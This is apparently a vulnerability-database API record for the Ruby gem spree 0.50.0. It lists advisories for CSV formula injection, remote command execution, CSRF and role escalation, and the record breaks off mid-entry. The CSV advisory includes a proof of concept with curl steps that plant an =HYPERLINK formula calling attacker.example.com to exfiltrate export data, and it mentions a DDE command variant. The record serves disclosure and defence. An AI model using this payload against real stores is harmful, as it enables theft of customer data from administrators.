Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/86146?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/86146?format=api", "purl": "pkg:gem/spree@0.50.0", "type": "gem", "namespace": "", "name": "spree", "version": "0.50.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/310104?format=api", "vulnerability_id": "VCID-153y-kwk2-xyfd", "summary": "Spree: CSV Formula Injection in Customer Export\n### Summary\n\nCSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted\nExport in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the\ncontext of the administrator's desktop, potentially exfiltrating data or executing OS commands\nvia DDE (Dynamic Data Exchange).\n\n---\n\n### Details\n\n#### Affected presenters and fields\n\n| Presenter | Path | User-controlled fields |\n|---|---|---|\n| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |\n\n#### Vulnerable code — `customer_presenter.rb` (representative example)\n\n```ruby\n# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53\ndef call\n csv = [\n customer.first_name, # ← written verbatim; may contain =HYPERLINK(...)\n customer.last_name, # ← user-controlled\n customer.email, \n customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),\n customer.address&.company, # ← user-controlled\n customer.address&.address1, # ← user-controlled\n customer.address&.address2, # ← user-controlled\n customer.address&.city, # ← user-controlled\n customer.address&.state_text,\n customer.address&.state_abbr,\n customer.address&.country&.name,\n customer.address&.country&.iso,\n customer.address&.zipcode,\n customer.phone, # ← user-controlled\n customer.amount_spent_in(Spree::Store.current.default_currency),\n customer.completed_orders.count,\n ]\n csv += metafields_for_csv(customer)\n csv\nend\n```\n\n---\n\n### PoC\n\n**Precondition**: A Spree store with public customer registration enabled (default\nconfiguration). No special permissions required for the attacker.\n\n#### Step 1 — Register as a customer with an injected first name\n\n```bash\ncurl -X POST https://store.example.com/api/v3/store/customers \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Spree-Api-Key: pk_<publishable_api_key>\" \\\n -d '{\n \"email\": \"attacker@evil.com\",\n \"password\": \"password123\",\n \"password_confirmation\": \"password123\",\n \"first_name\": \"=HYPERLINK(\\\"http://attacker.example.com/exfil?d=\\\"&B1,\\\"Click\\\")\",\n \"last_name\": \"Smith\"\n }'\n```\n\n#### Step 2 — Admin triggers a customer export\n\n```bash\ncurl -X POST https://store.example.com/api/v3/admin/exports \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"type\": \"Spree::Exports::Customers\", \"record_selection\": \"all\"}'\n```\n\n#### Step 3 — Admin polls until ready, then downloads\n\n```bash\n# Poll for completion\ncurl https://store.example.com/api/v3/admin/exports/<export_id> \\\n -H \"Authorization: Bearer <admin_jwt>\"\n\n# Download\ncurl https://store.example.com/api/v3/admin/exports/<export_id>/download \\\n -H \"Authorization: Bearer <admin_jwt>\" \\\n -o customers.csv\n```\n\n#### Step 4 — Verify injection in the raw CSV (without opening in Excel)\n\nOpen `customers.csv` in a text editor. The first data row will contain:\n\n```\n\"=HYPERLINK(\"\"http://attacker.example.com/exfil?d=\"\"&B1,\"\"Click\"\")\",\"Smith\",\"attacker@evil.com\",...\n```\n\n#### Step 5 — Admin opens `customers.csv` in Microsoft Excel (Windows)\n\n- Excel warns about external data connections; if the administrator clicks **Enable**, the\n `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=<B1_value>`.\n- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain\n email, address, and order total data for all exported customers.\n- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess\n is launched on the administrator's machine.\n\n---\n\n### Impact\n\n**Vulnerability class**: CSV / Formula Injection (CWE-1236)\n\n#### Who is impacted\n\n- **Administrators** who download and open export files in spreadsheet software are the\n direct victims. Administrative accounts have access to all store data, payment method\n configurations, customer PII, and full order history.\n\n#### Realistic attack chain\n\n| Step | Actor | Action | Privilege required |\n|---|---|---|---|\n| 1 | Attacker | Registers as customer | Public registration |\n| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |\n| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |\n| 4 | Admin | Opens CSV in Excel | None |\n| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |\n\n#### Data at risk\n\nAll data visible to the administrator in the spreadsheet at the time of opening, including:\n\n- All exported customer emails, names, addresses, phone numbers\n- Order totals and purchase history\n- Any other columns in the same export file", "references": [ { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.2.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.2.8" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.3.6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.3.6" }, { "reference_url": "https://github.com/spree/spree/releases/tag/v5.4.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/releases/tag/v5.4.3" }, { "reference_url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79" }, { "reference_url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79", "reference_id": "GHSA-xf4v-w5x5-pv79", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xf4v-w5x5-pv79" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/506693?format=api", "purl": "pkg:gem/spree@5.2.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.2.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/506694?format=api", "purl": "pkg:gem/spree@5.3.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.3.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/506695?format=api", "purl": "pkg:gem/spree@5.4.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@5.4.3" } ], "aliases": [ "GHSA-xf4v-w5x5-pv79" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-153y-kwk2-xyfd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/51452?format=api", "vulnerability_id": "VCID-7jum-4ny7-xuhy", "summary": "Remote Command Execution in Spree search functionality\nSpree versions prior to 0.60.2 contain a remote command execution\nvulnerability in the search functionality. The application fails to\nproperly sanitize input passed via the `search[:send][]` parameter,\nwhich is dynamically invoked using Ruby’s `send` method. This allows\nattackers to execute arbitrary shell commands on the server without\nauthentication.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10019", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.6931", "scoring_system": "epss", "scoring_elements": "0.98663", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.6931", "scoring_system": "epss", "scoring_elements": "0.98664", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.79644", "scoring_system": "epss", "scoring_elements": "0.99115", "published_at": "2026-06-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10019" }, { "reference_url": "https://github.com/advisories/GHSA-97vm-c39p-jr86", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-97vm-c39p-jr86" }, { "reference_url": "https://github.com/orgs/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://github.com/orgs/spree" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_search_exec.rb" }, { "reference_url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group" }, { "reference_url": "https://www.exploit-db.com/exploits/17941", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://www.exploit-db.com/exploits/17941" }, { "reference_url": "https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://www.vulncheck.com/advisories/spreecommerce-search-parameter-rce" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10019", "reference_id": "CVE-2011-10019", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10019" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml", "reference_id": "CVE-2011-10019.YML", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10019.yml" }, { "reference_url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/", "reference_id": "remote-command-product-group", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-08-14T13:45:30Z/" } ], "url": "https://web.archive.org/web/20111009192436/http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/86058?format=api", "purl": "pkg:gem/spree@0.60.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.60.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/158169?format=api", "purl": "pkg:gem/spree@0.70.0.rc2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.70.0.rc2" } ], "aliases": [ "CVE-2011-10019", "GHSA-97vm-c39p-jr86", "OSV-76011" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7jum-4ny7-xuhy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/51451?format=api", "vulnerability_id": "VCID-cwh1-mmky-ukcx", "summary": "Ensure that doorkeeper_token is valid when authenticating requests in API v2 calls\n### Impact\n\nThe perpetrator who previously obtained an old expired user\ntoken could use it to access Storefront API v2 endpoints.\n\n### Patches\n\nPlease upgrade to 3.7.11, 4.0.4, or 4.1.11 depending on your used Spree version.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15269", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49283", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49319", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49307", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49337", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49354", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00257", "scoring_system": "epss", "scoring_elements": "0.49344", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15269" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2020-15269.yml" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/e43643abfe51f54bd9208dd02298b366e9b9a847" }, { "reference_url": "https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/security/advisories/GHSA-f8cm-364f-q9qh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15269", "reference_id": "CVE-2020-15269", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15269" }, { "reference_url": "https://github.com/advisories/GHSA-f8cm-364f-q9qh", "reference_id": "GHSA-f8cm-364f-q9qh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f8cm-364f-q9qh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/78975?format=api", "purl": "pkg:gem/spree@3.7.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-yqz2-9hru-wkcs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.7.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/78976?format=api", "purl": "pkg:gem/spree@4.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-yqz2-9hru-wkcs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/78977?format=api", "purl": "pkg:gem/spree@4.1.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-yqz2-9hru-wkcs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@4.1.11" } ], "aliases": [ "CVE-2020-15269", "GHSA-f8cm-364f-q9qh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cwh1-mmky-ukcx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37819?format=api", "vulnerability_id": "VCID-s4mu-v75h-dfep", "summary": "Private information access through CSRF\nA vulnerability in the API can allow an attacker to commit CSRF gaining access to private information.", "references": [ { "reference_url": "http://osvdb.org/show/osvdb/119205", "reference_id": "", "reference_type": "", "scores": [], "url": "http://osvdb.org/show/osvdb/119205" }, { "reference_url": "https://spreecommerce.com/blog/security-updates-2015-3-3", "reference_id": "", "reference_type": "", "scores": [], "url": "https://spreecommerce.com/blog/security-updates-2015-3-3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/52198?format=api", "purl": "pkg:gem/spree@2.2.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.2.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/52199?format=api", "purl": "pkg:gem/spree@2.3.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.3.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/52200?format=api", "purl": "pkg:gem/spree@2.4.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.4.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/52201?format=api", "purl": "pkg:gem/spree@3.0.0.rc4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.0.rc4" } ], "aliases": [ "OSVDB-119205" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s4mu-v75h-dfep" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37505?format=api", "vulnerability_id": "VCID-t9gu-2vs3-g7cu", "summary": "Permissions, Privileges, and Access Controls\napp/models/spree/user.rb in spree_auth_devise in Spree does not perform mass assignment safely when updating a user, which allows remote authenticated users to assign arbitrary roles to themselves.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2013-2506", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38121", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38098", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38087", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38055", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38145", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00171", "scoring_system": "epss", "scoring_elements": "0.38149", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2013-2506" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth/CVE-2013-2506.yml" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2013-2506.yml" }, { "reference_url": "https://github.com/spree/spree_auth_devise", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree_auth_devise" }, { "reference_url": "https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree_auth_devise/commit/038d74771d3b5c13d13b738b73dfda1033a99f65" }, { "reference_url": "https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree_auth_devise/commit/fda3ab9fb536c64fe18a9b78bb21c6176b3ea24d" }, { "reference_url": "http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [], "url": "http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [], "url": "https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20131207040639/https://rubygems.org/gems/spree_auth_devise/versions" }, { "reference_url": "https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20160331131233/https://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": 